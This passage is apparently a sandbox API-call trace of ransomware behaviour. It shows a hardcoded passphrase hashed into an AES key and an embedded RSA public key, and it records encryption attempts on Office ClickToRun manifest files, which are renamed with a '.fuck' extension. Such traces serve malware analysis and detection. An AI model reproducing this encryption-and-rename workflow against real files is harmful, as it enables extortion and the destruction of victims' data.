CryptAcquireContextA (in: phProv=0x2b9d934, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d934*=0x28abf20) returned 1 [0239.422] CryptCreateHash (in: hProv=0x28abf20, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d938 | out: phHash=0x2b9d938) returned 1 [0239.425] lstrlenA (lpString="BnDJACPrUGotpmdReKbXlIsdzMlQm") returned 29 [0239.425] CryptHashData (hHash=0x2893af0, pbData=0x2856ea8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0239.425] CryptDeriveKey (in: hProv=0x28abf20, Algid=0x6610, hBaseData=0x2893af0, dwFlags=0x1000000, phKey=0x2b9d924 | out: phKey=0x2b9d924*=0x2893b70) returned 1 [0239.425] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0239.425] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d940, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c | out: pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c) returned 1 [0239.425] CryptAcquireContextA (in: phProv=0x2b9d930, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d930*=0x28ac938) returned 1 [0239.426] CryptImportPublicKeyInfo (in: hCryptProv=0x28ac938, dwCertEncodingType=0x1, pInfo=0x2898b00*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2898b30*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2898b38*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d928 | out: phKey=0x2b9d928*=0x2894670) returned 1 [0239.426] CryptEncrypt (in: hKey=0x2894670, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d918*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d918*=0x80) returned 1 [0239.427] CryptEncrypt (in: hKey=0x2894670, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28ad4e8*, pdwDataLen=0x2b9d92c*=0x18, dwBufLen=0x80 | out: pbData=0x28ad4e8*, pdwDataLen=0x2b9d92c*=0x80) returned 1 [0239.427] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28ad4e8, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0239.427] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d93c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9d93c*=0x0, lpOverlapped=0x0) returned 0 [0239.427] CryptEncrypt (in: hKey=0x2893b70, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d93c*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d93c*=0x10) returned 1 [0239.427] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0239.427] CloseHandle (hObject=0xffffffff) returned 1 [0239.427] CloseHandle (hObject=0xffffffff) returned 1 [0239.427] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.proofing.msi.16.en-us.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.proofing.msi.16.en-us.xml.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.proofing.msi.16.en-us.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.proofing.msi.16.en-us.xml"), bFailIfExists=0) returned 0 [0239.428] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.proofing.msi.16.en-us.xml", dwFileAttributes=0x0) returned 0 [0239.428] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.proofing.msi.16.en-us.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.proofing.msi.16.en-us.xml.gsg")) returned 0 [0239.429] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.proofing.msi.16.en-us.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.proofing.msi.16.en-us.xml"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.proofing.msi.16.en-us.xml.fuck" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.proofing.msi.16.en-us.xml.fuck")) returned 0 [0239.429] CryptDestroyHash (hHash=0x2893af0) returned 1 [0239.429] CryptDestroyKey (hKey=0x2893b70) returned 1 [0239.429] CryptReleaseContext (hProv=0x28abf20, dwFlags=0x0) returned 1 [0239.429] FindNextFileA (in: hFindFile=0x2893cf0, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0239.429] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e938 | out: lpSystemTimeAsFileTime=0x2b9e938) [0239.429] GetLastError () returned 0x5 [0239.429] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Publisher.Publisher.x-none.msi.16.x-none.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.publisher.publisher.x-none.msi.16.x-none.xml")) returned 0x20 [0239.430] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Publisher.Publisher.x-none.msi.16.x-none.xml", dwFileAttributes=0x80) returned 0 [0239.430] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Publisher.Publisher.x-none.msi.16.x-none.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.publisher.publisher.x-none.msi.16.x-none.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.430] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Publisher.Publisher.x-none.msi.16.x-none.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.publisher.publisher.x-none.msi.16.x-none.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.431] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Publisher.Publisher.x-none.msi.16.x-none.xml.gsg", dwFileAttributes=0x2) returned 0 [0239.432] CryptAcquireContextA (in: phProv=0x2b9d934, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d934*=0x28ab150) returned 1 [0239.435] CryptCreateHash (in: hProv=0x28ab150, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d938 | out: phHash=0x2b9d938) returned 1 [0239.435] lstrlenA (lpString="BnDJACPrUGotpmdReKbXlIsdzMlQm") returned 29 [0239.435] CryptHashData (hHash=0x2893b70, pbData=0x2856d90, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0239.435] CryptDeriveKey (in: hProv=0x28ab150, Algid=0x6610, hBaseData=0x2893b70, dwFlags=0x1000000, phKey=0x2b9d924 | out: phKey=0x2b9d924*=0x2893fb0) returned 1 [0239.435] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0239.435] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d940, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c | out: pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c) returned 1 [0239.435] CryptAcquireContextA (in: phProv=0x2b9d930, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d930*=0x28abe98) returned 1 [0239.435] CryptImportPublicKeyInfo (in: hCryptProv=0x28abe98, dwCertEncodingType=0x1, pInfo=0x2898210*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2898240*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2898248*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d928 | out: phKey=0x2b9d928*=0x28946f0) returned 1 [0239.435] CryptEncrypt (in: hKey=0x28946f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d918*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d918*=0x80) returned 1 [0239.436] CryptEncrypt (in: hKey=0x28946f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28abf20*, pdwDataLen=0x2b9d92c*=0x18, dwBufLen=0x80 | out: pbData=0x28abf20*, pdwDataLen=0x2b9d92c*=0x80) returned 1 [0239.436] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28abf20, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0239.436] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d93c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9d93c*=0x0, lpOverlapped=0x0) returned 0 [0239.436] CryptEncrypt (in: hKey=0x2893fb0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d93c*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d93c*=0x10) returned 1 [0239.436] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0239.436] CloseHandle (hObject=0xffffffff) returned 1 [0239.436] CloseHandle (hObject=0xffffffff) returned 1 [0239.436] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Publisher.Publisher.x-none.msi.16.x-none.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.publisher.publisher.x-none.msi.16.x-none.xml.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Publisher.Publisher.x-none.msi.16.x-none.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.publisher.publisher.x-none.msi.16.x-none.xml"), bFailIfExists=0) returned 0 [0239.436] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Publisher.Publisher.x-none.msi.16.x-none.xml", dwFileAttributes=0x0) returned 0 [0239.437] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Publisher.Publisher.x-none.msi.16.x-none.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.publisher.publisher.x-none.msi.16.x-none.xml.gsg")) returned 0 [0239.437] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Publisher.Publisher.x-none.msi.16.x-none.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.publisher.publisher.x-none.msi.16.x-none.xml"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Publisher.Publisher.x-none.msi.16.x-none.xml.fuck" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.publisher.publisher.x-none.msi.16.x-none.xml.fuck")) returned 0 [0239.438] CryptDestroyHash (hHash=0x2893b70) returned 1 [0239.438] CryptDestroyKey (hKey=0x2893fb0) returned 1 [0239.438] CryptReleaseContext (hProv=0x28ab150, dwFlags=0x0) returned 1 [0239.438] FindNextFileA (in: hFindFile=0x2893cf0, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0239.438] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e938 | out: lpSystemTimeAsFileTime=0x2b9e938) [0239.438] GetLastError () returned 0x5 [0239.438] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.publishermui.msi.16.en-us.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.publishermui.msi.16.en-us.xml")) returned 0x20 [0239.438] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.publishermui.msi.16.en-us.xml", dwFileAttributes=0x80) returned 0 [0239.439] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.publishermui.msi.16.en-us.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.publishermui.msi.16.en-us.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.439] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.publishermui.msi.16.en-us.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.publishermui.msi.16.en-us.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.440] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.publishermui.msi.16.en-us.xml.gsg", dwFileAttributes=0x2) returned 0 [0239.440] CryptAcquireContextA (in: phProv=0x2b9d934, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d934*=0x28acd78) returned 1 [0239.442] CryptCreateHash (in: hProv=0x28acd78, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d938 | out: phHash=0x2b9d938) returned 1 [0239.442] lstrlenA (lpString="BnDJACPrUGotpmdReKbXlIsdzMlQm") returned 29 [0239.442] CryptHashData (hHash=0x2893fb0, pbData=0x2856ef8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0239.442] CryptDeriveKey (in: hProv=0x28acd78, Algid=0x6610, hBaseData=0x2893fb0, dwFlags=0x1000000, phKey=0x2b9d924 | out: phKey=0x2b9d924*=0x2893af0) returned 1 [0239.442] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0239.442] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d940, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c | out: pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c) returned 1 [0239.442] CryptAcquireContextA (in: phProv=0x2b9d930, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d930*=0x28ace88) returned 1 [0239.443] CryptImportPublicKeyInfo (in: hCryptProv=0x28ace88, dwCertEncodingType=0x1, pInfo=0x28982e0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2898310*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2898318*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d928 | out: phKey=0x2b9d928*=0x28946b0) returned 1 [0239.443] CryptEncrypt (in: hKey=0x28946b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d918*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d918*=0x80) returned 1 [0239.443] CryptEncrypt (in: hKey=0x28946b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28ac608*, pdwDataLen=0x2b9d92c*=0x18, dwBufLen=0x80 | out: pbData=0x28ac608*, pdwDataLen=0x2b9d92c*=0x80) returned 1 [0239.443] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28ac608, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0239.443] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d93c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9d93c*=0x0, lpOverlapped=0x0) returned 0 [0239.443] CryptEncrypt (in: hKey=0x2893af0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d93c*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d93c*=0x10) returned 1 [0239.443] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0239.443] CloseHandle (hObject=0xffffffff) returned 1 [0239.443] CloseHandle (hObject=0xffffffff) returned 1 [0239.443] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.publishermui.msi.16.en-us.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.publishermui.msi.16.en-us.xml.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.publishermui.msi.16.en-us.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.publishermui.msi.16.en-us.xml"), bFailIfExists=0) returned 0 [0239.444] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.publishermui.msi.16.en-us.xml", dwFileAttributes=0x0) returned 0 [0239.444] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.publishermui.msi.16.en-us.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.publishermui.msi.16.en-us.xml.gsg")) returned 0 [0239.444] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.publishermui.msi.16.en-us.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.publishermui.msi.16.en-us.xml"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.publishermui.msi.16.en-us.xml.fuck" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.publishermui.msi.16.en-us.xml.fuck")) returned 0 [0239.445] CryptDestroyHash (hHash=0x2893fb0) returned 1 [0239.445] CryptDestroyKey (hKey=0x2893af0) returned 1 [0239.445] CryptReleaseContext (hProv=0x28acd78, dwFlags=0x0) returned 1 [0239.445] FindNextFileA (in: hFindFile=0x2893cf0, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0239.445] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e938 | out: lpSystemTimeAsFileTime=0x2b9e938) [0239.445] GetLastError () returned 0x5 [0239.445] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.shared.Office.x-none.msi.16.x-none.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.shared.office.x-none.msi.16.x-none.xml")) returned 0x20 [0239.445] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.shared.Office.x-none.msi.16.x-none.xml", dwFileAttributes=0x80) returned 0 [0239.446] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.shared.Office.x-none.msi.16.x-none.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.shared.office.x-none.msi.16.x-none.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.446] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.shared.Office.x-none.msi.16.x-none.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.shared.office.x-none.msi.16.x-none.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.447] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.shared.Office.x-none.msi.16.x-none.xml.gsg", dwFileAttributes=0x2) returned 0 [0239.447] CryptAcquireContextA (in: phProv=0x2b9d934, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d934*=0x28ab150) returned 1 [0239.450] CryptCreateHash (in: hProv=0x28ab150, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d938 | out: phHash=0x2b9d938) returned 1 [0239.450] lstrlenA (lpString="BnDJACPrUGotpmdReKbXlIsdzMlQm") returned 29 [0239.450] CryptHashData (hHash=0x2893fb0, pbData=0x2856ef8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0239.450] CryptDeriveKey (in: hProv=0x28ab150, Algid=0x6610, hBaseData=0x2893fb0, dwFlags=0x1000000, phKey=0x2b9d924 | out: phKey=0x2b9d924*=0x2893af0) returned 1 [0239.450] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0239.450] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d940, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c | out: pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c) returned 1 [0239.450] CryptAcquireContextA (in: phProv=0x2b9d930, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d930*=0x28ad240) returned 1 [0239.450] CryptImportPublicKeyInfo (in: hCryptProv=0x28ad240, dwCertEncodingType=0x1, pInfo=0x2897850*(Algorithm.pszObjId="1.2.840.113549.1.1.1", 